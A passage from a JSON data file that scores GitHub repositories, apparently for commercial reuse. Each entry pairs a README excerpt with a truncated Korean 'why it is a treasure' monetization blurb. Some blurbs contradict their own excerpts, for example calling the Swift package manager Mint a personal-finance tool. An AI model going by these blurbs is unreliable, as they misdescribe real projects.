align=\"center\">Kap</h3>\n  <p align=\"center\">An open-source screen recorder built with web technology<p>\n  <p align=\"center\"><a href=\"https://circleci.com/gh/wulkano/kap\"><img src=\"https://circleci.com/gh/wulkano/Kap.svg?style=shield\" alt=\"Build Status\"></a> <a href=\"https://github.com/sindresorhus/xo\"><img src=\"https://img.shields.io/badge/code_style-XO-5ed9c7.svg\" alt=\"XO code style\"></a></p>\n</p>\n\n[![SWUbanner](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://vshymanskyy.github.io/StandWithUkraine/)\n\n## Get Kap\n\nDownload the latest release:\n\n- [Apple silicon](https://getkap.co/api/download/arm64)\n- [Intel](https://getkap.co/api/download/x64)\n\nOr install with [Homebrew-Cask](https://caskroom.github.io):\n\n```sh\nbrew install --cask kap\n```\n\n## How To Use Kap\n\nClick the menu bar icon to bring up the screen recorder. After selecting what portion of th","composite_score":0.2622,"license_safety_tag":"safe"},{"name":"facundoolano/rpg-cli","github_url":"https://github.com/facundoolano/rpg-cli","stars":16,"language":"Rust","license":"MIT","abandonment_months":13,"description":"# RPG-CLI 상업화 분석\n\n## 왜 보물인가\n명령어 입력으로 RPG 게임을 즐기는 독특한 경험을 제공하는 도구로, 게임에 관심 있는 개발자와 게이머들 사이에서 새로운 엔터테인먼트 형태로 주목받을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n웹 기반 RPG 플랫폼으로 제공하여 가입자들이 브라우저에서 즉시 게임을 플레이하도록 서","readme_excerpt":"# rpg-cli — your filesystem as a dungeon!\n\nrpg-cli is a minimalist [computer RPG](https://en.wikipedia.org/wiki/Role-playing_video_game) written in Rust. Its command-line interface can be used as a `cd` replacement where you randomly encounter enemies as you change directories.\n\n![](rpg-cli.png)\n\nFeatures:\n\n* Character stats and leveling system.\n* Automatic turn-based combat.\n* Item and equipment support.\n* Warrior, thief and mage player classes.\n* 15+ Enemy classes.\n* Extensible player and enemy classes via configuration.\n* Permadeath with item recovering.\n* Quests to-do list.\n* Chests hidden in directories.\n\nSee [this blog post](https://olano.dev/blog/deconstructing-the-role-playing-videogame/) for background on the development process.\n\n## Installation\n\n### From binary\n\nJust download the binary for your platform (linux/macOS/windows) from the [GitHub releases page](https://github.com/facundoolano/rpg-cli/releases/latest).\n\n### Using Cargo\nAssuming you have [Rust and Cargo installed]","composite_score":0.2615,"license_safety_tag":"safe"},{"name":"siduck76/dotfiles","github_url":"https://github.com/siduck76/dotfiles","stars":5,"language":"CSS","license":"unknown","abandonment_months":13,"description":"# siduck76/dotfiles 분석\n\n## 왜 보물인가\n컴퓨터를 쓸 때 자신의 취향대로 꾸미고 설정한 개인 환경을 저장·공유하는 도구로, 비슷한 환경을 원하는 많은 사용자들이 찾는 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 맞춤 설정 판매**: 초보 개발자들을 위해 이미 정리된 설정을 월 구독 형태로 제공하는 SaaS\n2. **회사 IT ","readme_excerpt":"# DONT SKIP THE README \n# Screenshots (BSPWM)\n\n![cro](https://user-images.githubusercontent.com/59060246/229421291-5ebf398e-9fb2-4507-a317-b391b0a62a50.png)\n \n# Important Notes For BSPWM \n\n- Fonts needed : any nerdfont (JetbrainsMono Nerd Font is what I use) and material design icon font\n\n- My bspwm has workspaces named from 1 to 5 , and the polybar bspwm module uses those workspace names only . So if workspace icons dont show for you then add this    in bspwmrc  bspc monitor -d 1 2 3 4 5  . \n- I use [ST](https://github.com/siduck/st)  as terminal with JetbrainsMono Nerd Font medium.\n- Music player : ncmpcpp with mpd ( ncmpcpp-ueberzug to show artwork) , configs in cli_tools folder. you need to chmod +x its scripts in ncmcpp-ueberzug and ffmpeg , mpc is needed to show albumn art and check the .bashrc for important aliases. \n- [neovim config](https://github.com/NvChad/nvchad) + rename nvim folder as custom and move it to ~/.config/nvim/lua if you've installed nvchad.\n\n- gtk theme : my o","composite_score":0.2611,"license_safety_tag":"unknown"},{"name":"yonaskolb/Mint","github_url":"https://github.com/yonaskolb/Mint","stars":6,"language":"Swift","license":"MIT","abandonment_months":5,"description":"# Mint 저장소 분석\n\n## 왜 보물인가\n개인 재정 관리를 자동화하는 도구로, 사람들이 복잡한 금융 정보를 쉽게 정리하고 이해할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **개인 금융 관리 SaaS**: 월급통장, 지출 추적, 자산 관리 앱으로 개인 사용자에게 월 구독료 받기\n2. **은행 및 금융사 내부 도구**: 기존 뱅킹 앱에 통합하여 ","readme_excerpt":"# Mint 🌱\n\n[![Swift Versions](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fyonaskolb%2FMint%2Fbadge%3Ftype%3Dswift-versions&style=for-the-badge)](https://swiftpackageindex.com/yonaskolb/Mint)\n[![Platforms](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fyonaskolb%2FMint%2Fbadge%3Ftype%3Dplatforms&style=for-the-badge)](https://swiftpackageindex.com/yonaskolb/Mint)\n[![Git Version](https://img.shields.io/github/release/yonaskolb/Mint.svg?style=for-the-badge)](https://github.com/yonaskolb/Mint/releases)\n[![License](https://img.shields.io/github/license/yonaskolb/Mint.svg?style=for-the-badge)](https://github.com/yonaskolb/Mint/blob/master/LICENSE)\n\nA package manager that installs and runs Swift command line tool packages.\n\n```sh\nmint run realm/SwiftLint@0.40.3\n```\nThis would install and run [SwiftLint](https://github.com/realm/SwiftLint) version 0.40.3\n\nMint is designed to be used with Swift command line","composite_score":0.261,"license_safety_tag":"safe"},{"name":"maghoff/sausagewiki","github_url":"https://github.com/maghoff/sausagewiki","stars":16,"language":"Rust","license":"gpl-3.0","abandonment_months":21,"description":"# sausagewiki 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 자신의 지식을 정리하고 공유할 수 있는 개인용 위키 시스템으로, 복잡한 기술 없이도 소규모 팀이나 조직의 정보 저장소를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 회사의 사내 위키 플랫폼으로 제공하여 직원들의 업무 매뉴얼, 프로젝트 정보, 회사 문화를","readme_excerpt":"[![Build Status](https://travis-ci.org/maghoff/sausagewiki.svg?branch=master)](https://travis-ci.org/maghoff/sausagewiki)\n\nSausagewiki is a simple, self-contained wiki engine.\n\nCopyright (C) 2017 Magnus Hovland Hoff <maghoff@gmail.com>\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\n\nFeatures\n========\nSome features of Sausagewiki, in no particular order:\n\n * Simple to [install and run](#install-and-run), no runtime dependencies\n * Reasonable to [back up](https://github.com/maghoff/sausagewiki/wiki/Backup),\n   there is only one data file\n * Can be reverse proxied behind any path without configuration\n * Snappy, light resource usage\n * Markdown syntax\n    * Plus [table-support](https://help.github.com/articles/organizing-information-with-tables/)\n    * Without embedded HTML\n * Full text search\n * R","composite_score":0.2607,"license_safety_tag":"restricted"},{"name":"styleguidist/react-styleguidist","github_url":"https://github.com/styleguidist/react-styleguidist","stars":8,"language":"TypeScript","license":"mit","abandonment_months":17,"description":"# React Styleguidist 프로젝트 분석\n\n## 왜 보물인가\n웹사이트를 만드는 회사들이 디자인 일관성을 유지하기 위해 필수적으로 필요한 \"디자인 설명서 자동 생성 도구\"입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 디자인 시스템 SaaS 서비스**\n스타트업이나 중소 규모 IT회사들에게 월간 구독 형태로 자동 디자인 가이드 생성 및 공유 플랫폼을 ","readme_excerpt":"<div align=\"center\" markdown=\"1\">\n\n<img src=\"https://d3vv6lp55qjaqc.cloudfront.net/items/061f0A2n1B0H3p0T1p1f/react-styleguidist-logo.png\" alt=\"React Styleguidist\" width=\"400\">\n\n**Isolated React component development environment with a living style guide**\n\n [![npm](https://img.shields.io/npm/v/react-styleguidist.svg)](https://www.npmjs.com/package/react-styleguidist) [![CI status](https://github.com/styleguidist/react-styleguidist/workflows/CI/badge.svg)](https://github.com/styleguidist/react-styleguidist.git/actions) [![Codecov](https://codecov.io/gh/styleguidist/react-styleguidist/branch/master/graph/badge.svg)](https://codecov.io/gh/styleguidist/react-styleguidist) [![Join the chat at https://gitter.im/styleguidist/styleguidist](https://badges.gitter.im/styleguidist/styleguidist.svg)](https://gitter.im/styleguidist/styleguidist?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n<a href=\"https://discord.gg/QWsybqJDTA\">![Discord](https://img.shields.io/discord","composite_score":0.2607,"license_safety_tag":"safe"},{"name":"jsdoc3/jsdoc","github_url":"https://github.com/jsdoc3/jsdoc","stars":9,"language":"JavaScript","license":"Apache-2.0","abandonment_months":0,"description":"# JSDoc3 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 작성한 코드를 자동으로 설명서로 변환해주는 도구로, 소프트웨어 회사들이 필수적으로 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **API 문서 자동 생성 SaaS**: 개발자들이 코드를 업로드하면 자동으로 예쁜 설명서를 만들어주는 웹 서비스\n2. **소프트웨어 개발사의 내부 도구**: 대규모","readme_excerpt":"# JSDoc\n\n![Build status](https://github.com/jsdoc/jsdoc/workflows/build/badge.svg)\n\nAn API documentation generator for JavaScript.\n\nWant to contribute to JSDoc? Please read [`CONTRIBUTING.md`](CONTRIBUTING.md).\n\n## Installation and Usage\n\nJSDoc supports stable versions of Node.js 8.15.0 and later. You can install\nJSDoc globally or in your project's `node_modules` folder.\n\nTo install the latest version on npm globally (might require `sudo`;\n[learn how to fix this](https://docs.npmjs.com/resolving-eacces-permissions-errors-when-installing-packages-globally)):\n\n    npm install -g jsdoc\n\nTo install the latest version on npm locally and save it in your package's\n`package.json` file:\n\n    npm install --save-dev jsdoc\n\n**Note**: By default, npm adds your package using the caret operator in front of\nthe version number (for example, `^3.6.3`). We recommend using the tilde\noperator instead (for example, `~3.6.3`), which limits updates to the most\nrecent patch-level version. See\n[this Stack Overf","composite_score":0.2606,"license_safety_tag":"safe"},{"name":"lefex/FE","github_url":"https://github.com/lefex/FE","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":18,"description":"","readme_excerpt":"## 《前端小课》前端从 0 到 1，免费电子书\n\n《前端小课》是通过图片、文字、代码、视频等多种方式写成的一本多媒体电子书。全书分为不同的小书，每本小书旨在讲透一个知识点。比如 CSS布局、JavaScript基础、动画。以最基础的编程知识为起点，即使不懂编程的小白也能够通过本书学会编程，顺利进入互联网行业。\n\n本书最大的特色是通过公众号+图书+网站形成一个闭环。读者可通过公众号实时获得最新的前端知识，并与作者实时互动；通过图书可以系统地学习前端知识，对前端知识形成一个整体的认识；通过网站可看到代码的实现运行效果。\n\n#### 网站入口，电子书入口（国内）：https://lefex.gitee.io/\n#### 网站入口，电子书入口（国外）： https://lefex.github.io/\n#### 大厂前端面试真题解析： https://lefex.github.io/bat\n\n![官网](https://s1.ax1x.com/2020/10/16/0bz8KS.jpg)\n\n前端小课，一本帮助你学习前端的多媒体电子书。每天一小课，分阶段、系统地学习前端知识。如果你有编程基础，这个课程非常适合你。\n\n- [前端学习路线](https://mp.weixin.qq.com/s/yveUo-1akuhP4Yi8wUZPhg)\n- [前端小课开课啦](https://mp.weixin.qq.com/s/6_3hSOw5Lv4p-vxIJS1woQ)\n- [学习前端的 8 个专题](https://mp.weixin.qq.com/s/H7k8IHxL-YmxCE-QQDc12w)\n- [我的2019 —我与《前端小课》](https://mp.weixin.qq.com/s/AktmmOJ0HRJ3daZVxYMR_A)\n- [2020年我对大前端的认知](https://mp.weixin.qq.com/s/7v-f9ZbxsehiIGX3l0uO-A)\n- [demo 合集](https://github.com/lefex/FE/tree/master/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/code)\n\n## 前端专题\n\n汇集了前端各种解决方案，比如编辑器、在线编辑、工程化、性能优化、浏览器插件、Javascript、D","composite_score":0.2606,"license_safety_tag":"unknown"},{"name":"processhacker/processhacker","github_url":"https://github.com/processhacker/processhacker","stars":5,"language":"C","license":"MIT","abandonment_months":0,"description":"# Process Hacker 상용화 분석\n\n## 왜 보물인가\n컴퓨터에서 실행 중인 프로그램들을 감시하고 제어할 수 있는 고급 도구로, 기업의 보안 관리와 성능 모니터링에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 관리 SaaS**: 직원 PC의 불필요한 프로그램 실행 감시 및 차단 서비스\n2. **악성코드 탐지 API**: 보안업체들이 ","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://systeminformer.com\">\n        <img src=\"https://github.com/winsiderss/systeminformer/raw/master/SystemInformer/resources/systeminformer-128x128.png\"/>\n    </a>\n    <h1 align=\"center\">System Informer</h1>\n    <h5 align=\"center\">A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.</h5>\n    <h6 align=\"center\">Brought to you by Winsider Seminars & Solutions, Inc.</h6>\n</p>\n<p align=\"center\">\n    <a href=\"https://github.com/winsiderss/systeminformer/actions/workflows/msbuild.yml\">\n        <img src=\"https://img.shields.io/github/actions/workflow/status/winsiderss/systeminformer/msbuild.yml?branch=master&style=for-the-badge\"/>\n    </a>\n    <a href=\"https://github.com/winsiderss/systeminformer/graphs/contributors\">\n        <img src=\"https://img.shields.io/github/contributors/winsiderss/systeminformer.svg?style=for-the-badge&color=blue\"/>\n    </a>\n    <a href=\"https://opensource.org/licenses/MIT\">","composite_score":0.2603,"license_safety_tag":"safe"},{"name":"googlecodelabs/tools","github_url":"https://github.com/googlecodelabs/tools","stars":5,"language":"Go","license":"apache-2.0","abandonment_months":10,"description":"# Google Code Labs Tools 분석\n\n## 왜 보물인가\nGoogle이 공식 지원하는 개발자 교육 도구로, 신뢰성 있는 학습 자료와 실습 환경을 제공하는 검증된 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 직원 교육 SaaS**: 대기업의 신입사원 온보딩이나 부서별 기술 교육 프로그램에 이 도구를 포함한 구독형 학습 플랫폼\n2. *","readme_excerpt":"# Tools for authoring and serving codelabs\n\nCodelabs are interactive instructional tutorials, which can be authored in Google Docs\nusing some simple formatting conventions. You can also author codelabs using markdown syntax.\nThis repo contains all the tools and documentation you’ll need for building and publishing\nyour own codelabs.\n\nIf you're interested in authoring codelabs, create a doc following the [Codelab Formatting Guide](FORMAT-GUIDE.md). \nand see the [claat](claat) directory for a detailed description of the `claat` command line tool.\n\nAlso, consider joining the [codelab-authors Google Group](https://groups.google.com/forum/#!forum/codelab-authors),\nwhich connects you with other authors and provides updates on new releases. \n\n## What is this?\n\nFor the past 3+ years, the CLaaT (Codelabs as a Thing) project has given developers around the\nworld a hands-on experience with Google products and tools.  We’ve accumulated over 500 high quality\ncodelabs, served millions of web visitor","composite_score":0.2601,"license_safety_tag":"safe"},{"name":"owner888/phpspider","github_url":"https://github.com/owner888/phpspider","stars":6,"language":"PHP","license":"unknown","abandonment_months":18,"description":"# phpspider 저장소 분석\n\n## 왜 보물인가\n웹사이트의 정보를 자동으로 수집하는 도구로, 시간이 많이 걸리는 데이터 수집 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **시장 조사 SaaS**: 경쟁사 가격 정보를 자동으로 모니터링하는 구독 서비스\n2. **부동산 중개소 업무 도구**: 여러 포털사이트의 매물 정보를 한 곳에서 관","readme_excerpt":"# phpspider -- PHP蜘蛛爬虫框架\n《我用爬虫一天时间“偷了”知乎一百万用户，只为证明PHP是世界上最好的语言 》所使用的程序  \n\nphpspider是一个爬虫开发框架。使用本框架，你不用了解爬虫的底层技术实现，爬虫被网站屏蔽、有些网站需要登录或验证码识别才能爬取等问题。简单几行PHP代码，就可以创建自己的爬虫，利用框架封装的多进程Worker类库，代码更简洁，执行效率更高速度更快。\n\ndemo目录下有一些特定网站的爬取规则，只要你安装了PHP环境，代码就可以在命令行下直接跑。 对爬虫感兴趣的开发者可以加QQ群一起讨论：147824717。\n\n下面以糗事百科为例, 来看一下我们的爬虫长什么样子:\n\n```\n$configs = array(\n    'name' => '糗事百科',\n    'domains' => array(\n        'qiushibaike.com',\n        'www.qiushibaike.com'\n    ),\n    'scan_urls' => array(\n        'http://www.qiushibaike.com/'\n    ),\n    'content_url_regexes' => array(\n        \"http://www.qiushibaike.com/article/\\d+\"\n    ),\n    'list_url_regexes' => array(\n        \"http://www.qiushibaike.com/8hr/page/\\d+\\?s=\\d+\"\n    ),\n    'fields' => array(\n        array(\n            // 抽取内容页的文章内容\n            'name' => \"article_content\",\n            'selector' => \"//*[@id='single-next-link']\",\n            'required' => true\n        ),\n        array(\n            // 抽取内容页的文章作者\n            'name' => \"article_author\",\n            ","composite_score":0.2597,"license_safety_tag":"unknown"},{"name":"brianegan/scoped_model","github_url":"https://github.com/brianegan/scoped_model","stars":8,"language":"Dart","license":"bsd-3-clause","abandonment_months":21,"description":"# brianegan/scoped_model 분석\n\n## 왜 보물인가\n앱 개발할 때 복잡한 데이터 관리를 간단하게 만들어주는 도구로, 개발자들이 더 빠르고 안정적으로 앱을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 서비스**: 스타트업이나 중소 개발사가 앱 만들 때 이 도구를 포함한 개발 플랫폼 제공\n2. **개발자 교육 ","readme_excerpt":"# scoped_model\n\n[![Build Status](https://travis-ci.org/brianegan/scoped_model.svg?branch=master)](https://travis-ci.org/brianegan/scoped_model)  [![codecov](https://codecov.io/gh/brianegan/scoped_model/branch/master/graph/badge.svg)](https://codecov.io/gh/brianegan/scoped_model)\n\nA set of utilities that allow you to easily pass a data Model from a parent Widget down to its descendants. In addition, it also rebuilds all of the children that use the model when the model is updated. This library was originally extracted from the Fuchsia codebase. \n\nThis Library provides three main classes:\n\n  * The `Model` class. You will extend this class to create your own Models, such as `SearchModel` or `UserModel`. You can listen to Models for changes!\n  * The `ScopedModel` Widget. If you need to pass a `Model` deep down your Widget hierarchy, you can wrap your `Model` in a `ScopedModel` Widget. This will make the Model available to all descendant Widgets.\n  * The `ScopedModelDescendant` Widget. Use ","composite_score":0.2592,"license_safety_tag":"safe"},{"name":"roginvs/space-rangers-quest","github_url":"https://github.com/roginvs/space-rangers-quest","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":5,"description":"# Space Rangers Quest 저장소 분석\n\n## 왜 보물인가\n우주 탐험 게임의 퀘스트 시스템을 만드는 오픈소스 도구로, 게임 개발자들이 복잡한 스토리 기능을 쉽게 구현할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 플랫폼 SaaS**: 브라우저에서 바로 우주 게임을 만들고 배포할 수 있는 구독 서비스\n2. **게임사 내부 도","readme_excerpt":"# Онлайн плеер квестов из Космических рейнджеров\n\n[Играть можно тут](https://spacerangers.gitlab.io)\n\nЕсли не открывается то попробуйте через VPN.\n\nДолжно работать во всех современных браузерах\n\n## Происхождение\n\nОснован на описании формата qm `lastqm.txt` и исследовании поведения TGE 4.3.0/5.2.10.\n\n## Сборка\n\n- Файлы квестов (_.qm, _.qmm) нужно извлечь из игры и положить в `borrowed/qm/SR 2.1.2170/`\n  - и/или в `borrowed/qm/SR 2.1.2121 eng/`\n  - и/или в `borrowed/qm/Tge 4.2.5/`\n  - и/или в `borrowed/qm/anyNameHere/`\n- Картинки в `borrowed/qm/img/`\n- Звуки и музыку положить в `borrowed/sound/` и в `borrowed/track/` соответственно (даже если ничего нет то всё равно нужно эти директории создать)\n- По-умолчанию музыка фоном включается рандомно из папки `borrowed/track/`. Чтобы убрать какой-то трек из рандомной ротации нужно создать файл `borrowed/track/randomignore.txt` где на каждой строчке написать имя файла который рандомно включать не нужно.\n- Затем всё собрать (установив предваритель","composite_score":0.259,"license_safety_tag":"safe"},{"name":"mre/awesome-static-analysis","github_url":"https://github.com/mre/awesome-static-analysis","stars":6,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# mre/awesome-static-analysis 분석\n\n## 왜 보물인가\n소프트웨어 개발 시 버그나 문제를 자동으로 찾아주는 도구들을 한곳에 정리한 컬렉션으로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 개발사를 위한 \"코드 품질 검사 자동화\" 클라우드 서비스로 제공\n2. **내부 업무 도구*","readme_excerpt":"<!-- 🚨🚨 DON'T EDIT THIS FILE DIRECTLY. Edit `data/tools.yml` instead. 🚨🚨 -->\n\n <a href=\"https://analysis-tools.dev/\">\n   <img alt=\"Analysis Tools Website\" src=\"https://raw.githubusercontent.com/analysis-tools-dev/assets/master/static/redesign.svg\" />\n </a>\n\nThis repository lists **static analysis tools** for all programming languages, build tools, config files and more. The focus is on tools which improve code quality such as linters and formatters.\nThe official website, [analysis-tools.dev](https://analysis-tools.dev/) is based on this repository and adds rankings, user comments, and additional resources like videos for each tool.\n\n[![Website](https://img.shields.io/badge/Website-Online-2B5BAE)](https://analysis-tools.dev)\n![CI](https://github.com/analysis-tools-dev/static-analysis/workflows/CI/badge.svg)\n[![Links](https://github.com/analysis-tools-dev/static-analysis/actions/workflows/links.yml/badge.svg)](https://github.com/analysis-tools-dev/static-analysis/actions/workflows/links.","composite_score":0.2588,"license_safety_tag":"safe"},{"name":"ankane/react-chartkick","github_url":"https://github.com/ankane/react-chartkick","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":5,"description":"# React Chartkick 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱에서 복잡한 차트와 그래프를 쉽게 만들 수 있는 도구로, 데이터를 시각적으로 아름답게 표현하려는 개발자들에게 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 판매량, 회원 통계, 수익 현황 등을 보여주는 대시보드 기능이 필요한 웹 기반 업무 관리 시스템\n2","readme_excerpt":"# React Chartkick\n\nCreate beautiful JavaScript charts with one line of React\n\n[See it in action](https://www.chartkick.com/react)\n\nSupports [Chart.js](https://www.chartjs.org/), [Google Charts](https://developers.google.com/chart/), and [Highcharts](https://www.highcharts.com/)\n\n[![Build Status](https://github.com/ankane/react-chartkick/actions/workflows/build.yml/badge.svg)](https://github.com/ankane/react-chartkick/actions)\n\n## Quick Start\n\nRun\n\n```sh\nnpm install react-chartkick chart.js\n```\n\nAnd add\n\n```javascript\nimport { LineChart, PieChart } from 'react-chartkick'\nimport 'chartkick/chart.js'\n```\n\nThis sets up Chartkick with Chart.js. For other charting libraries, see [detailed instructions](#installation).\n\n## Charts\n\nLine chart\n\n```jsx\n<LineChart data={{\"2025-01-01\": 11, \"2025-01-02\": 6}} />\n```\n\nPie chart\n\n```jsx\n<PieChart data={[[\"Blueberry\", 44], [\"Strawberry\", 23]]} />\n```\n\nColumn chart\n\n```jsx\n<ColumnChart data={[[\"Sun\", 32], [\"Mon\", 46], [\"Tue\", 28]]} />\n```\n\nBar chart\n\n``","composite_score":0.2587,"license_safety_tag":"safe"},{"name":"ALEX11BR/ThemeChanger","github_url":"https://github.com/ALEX11BR/ThemeChanger","stars":6,"language":"Python","license":"GPL-2.0","abandonment_months":13,"description":"# ThemeChanger 상용화 분석\n\n## 왜 보물인가\n컴퓨터 화면의 색상 테마를 자동으로 바꿔주는 도구로, 사용자의 눈 피로를 줄이고 작업 효율을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독료를 받고 클라우드 기반 테마 설정 관리 서비스 제공\n2. **내부 업무 도구**: 대기업 IT팀이 직원 컴퓨터에 일괄 설치하","readme_excerpt":"# ThemeChanger\n![A screenshot of our lovely ThemeChanger](screenshot1.png)\n\nThis app is a theme changing utility for Linux, BSDs, and whatnots.\nIt lets the user change GTK 2/3/4, Kvantum, icon and cursor themes, even for libadwaita apps, edit GTK CSS with live preview, and set some related options.\nIt also lets the user install icon and widget theme archives.\n\n## Features\n- Set the GTK 3 theme, sync the GTK2, GTK4, Kvantum themes with it or choose another one for each of these toolkits\n- Set the icon theme\n- Set the cursor theme, and tweak the cursor's size\n- Set all these themes with a special searchable selector with previews for GTK3, icon and cursor themes\n- Set various options like whether buttons have images or not\n- Instantaneously apply your setting changes to the running applications in GNOME, Cinnamon, Mate, XFCE, LXDE using lxsession, or using [xsettingsd](https://github.com/derat/xsettingsd) (you must download xsettingsd and run it in the background) for those that don't us","composite_score":0.2584,"license_safety_tag":"restricted"},{"name":"calebporzio/project-x","github_url":"https://github.com/calebporzio/project-x","stars":50,"language":"HTML","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"# Alpine.js\n\nGo to the Alpine docs for most things: [Alpine Docs](https://alpinejs.dev)\n\nYou are welcome to submit updates to the docs by submitting a PR to this repo. Docs are located in the [`/packages/docs`](/packages/docs) directory.\n\nStay here for contribution-related information.\n\n> Looking for V2 docs? [here they are](https://github.com/alpinejs/alpine/tree/v2.8.2)\n\n<p align=\"center\"><a href=\"https://alpinejs.dev/patterns\"><img src=\"/hero.jpg\" alt=\"Alpine Component Patterns\"></a></p>\n\n## Contribution Guide:\n\n### Quickstart\n\n* clone this repo locally\n* run `npm install` & `npm run build`\n* Include the `/packages/alpinejs/dist/cdn.js` file from a `<script>` tag on a webpage and you're good to go!\n\n### Brief Tour\nYou can get everything installed with: `npm install` in the root directory of this repo after cloning it locally.\n\nThis repo is a \"mono-repo\" using npm workspaces for managing the packages. Each package has its own folder in the `/packages` directory.\n\nRather than having t","composite_score":0.2584,"license_safety_tag":"safe"},{"name":"varbhat/exatorrent","github_url":"https://github.com/varbhat/exatorrent","stars":12,"language":"Go","license":"GPL-3.0","abandonment_months":13,"description":"# exatorrent 분석 보고서\n\n## 왜 보물인가\n토렌트 파일을 쉽게 다운로드하고 관리할 수 있는 도구로, 대용량 파일 배포가 필요한 개인과 조직에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 파일 배포 SaaS**\n- 대용량 소프트웨어 업데이트나 데이터셋을 전 세계 사용자에게 빠르게 배포하는 서비스로 운영\n\n**2. 개","readme_excerpt":"# *exatorrent*\n## 🧲 self-hostable torrent client\n\n![GitHub Repo stars](https://img.shields.io/github/stars/varbhat/exatorrent)\n![Latest Release](https://img.shields.io/github/release/varbhat/exatorrent)\n![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/varbhat/exatorrent)\n![GitHub License](https://img.shields.io/github/license/varbhat/exatorrent?logoColor=violet)\n\n![Linux](https://img.shields.io/badge/Linux-%23.svg?logo=linux&color=FCC624&logoColor=black)\n![macOS](https://img.shields.io/badge/macOS-%23.svg?logo=apple&color=000000&logoColor=white)\n![Windows](https://img.shields.io/badge/Windows-%23.svg?logo=windows&color=0078D6&logoColor=white)\n![Docker](https://img.shields.io/badge/docker-%23.svg?logo=docker&color=1D63ED&logoColor=white)\n![Podman](https://img.shields.io/badge/podman-%23.svg?logo=podman&color=734392&logoColor=white)\n\n<p><a href=\"docs/screenshots.md\">Screenshots</a> &bull; <a href=\"https://github.com/varbhat/exatorrent/releases/latest\">Releases<","composite_score":0.2581,"license_safety_tag":"restricted"},{"name":"MagicalTux/magictls","github_url":"https://github.com/MagicalTux/magictls","stars":6,"language":"Go","license":"MIT","abandonment_months":5,"description":"# MagicalTux/magictls 분석 리포트\n\n## 왜 보물인가\n인터넷 보안을 담당하는 핵심 기술(TLS)을 간단하게 만드는 도구로, 온라인 서비스를 안전하게 운영하려는 모든 기업이 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **API 보안 판매 서비스**: 중소 회사들의 온라인 통신을 암호화해주는 월 구독 서비스로 운영\n2. **SaaS 보안","readme_excerpt":"# MagicTLS\n\n[![Build Status](https://github.com/KarpelesLab/magictls/workflows/Go/badge.svg)](https://github.com/KarpelesLab/magictls/actions)\n[![GoDoc](https://godoc.org/github.com/KarpelesLab/magictls?status.svg)](https://godoc.org/github.com/KarpelesLab/magictls)\n\nA Go library that provides automatic protocol detection for TCP connections, enabling a single port to handle multiple protocols transparently.\n\n## Features\n\n- **Automatic TLS Detection**: Distinguishes between TLS/SSL and plaintext connections on the same port\n- **PROXY Protocol Support**: Detects both PROXY v1 and v2 headers to extract real client IPs (essential for load balancers like AWS ELB, Google Cloud LB)\n- **Protocol Routing**: Routes connections to different handlers based on TLS-negotiated protocols (ALPN)\n- **Extensible Filter System**: Add custom protocol detection with the Filter interface\n- **Zero External Dependencies**: Uses only the Go standard library\n\n## Installation\n\n```bash\ngo get github.com/KarpelesL","composite_score":0.2581,"license_safety_tag":"safe"},{"name":"danistefanovic/build-your-own-x","github_url":"https://github.com/danistefanovic/build-your-own-x","stars":146,"language":"Markdown","license":"unknown","abandonment_months":3,"description":"# build-your-own-x 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어, 데이터베이스, 게임 엔진 등 복잡한 소프트웨어를 처음부터 직접 만드는 방법을 배울 수 있는 교육용 가이드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 유료 코딩 부트캠프에서 심화 학습 자료로 제공\n2. **기업 내부 교육**: IT회사의 신입 개","readme_excerpt":"[![Banner](https://codecrafters.io/images/new-ccgithub-banner.png)](https://codecrafters.io/github-banner)\n\n## Build your own &lt;insert-technology-here&gt;\n\nThis repository is a compilation of well-written, step-by-step guides for re-creating our favorite technologies from scratch. \n\n> *What I cannot create, I do not understand — Richard Feynman.*\n\nIt's a great way to learn.\n\n* [3D Renderer](#build-your-own-3d-renderer)\n* [AI Model](#ai-model)\n* [Augmented Reality](#build-your-own-augmented-reality)\n* [BitTorrent Client](#build-your-own-bittorrent-client)\n* [Blockchain / Cryptocurrency](#build-your-own-blockchain--cryptocurrency)\n* [Bot](#build-your-own-bot)\n* [Command-Line 